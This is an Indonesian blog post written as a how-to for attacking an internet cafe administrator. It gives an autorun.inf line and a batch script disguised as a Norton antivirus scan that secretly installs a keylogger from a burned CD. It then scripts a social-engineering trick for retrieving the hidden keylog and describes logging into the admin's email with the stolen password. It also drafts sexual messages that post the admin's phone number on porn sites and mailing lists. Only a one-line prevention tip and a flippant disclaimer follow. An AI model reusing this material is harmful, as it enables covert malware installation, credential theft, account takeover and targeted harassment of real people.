Jumat, Agustus 21, 2009

Apa yang bisa kita lakukan di warnet ??

|---[Table of Content

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
[+] Kesimpulan
[+] Referensi


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!! :)
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya :)
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah :)


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.


6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi
Self implementing

Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

Tidak ada komentar:

Posting Komentar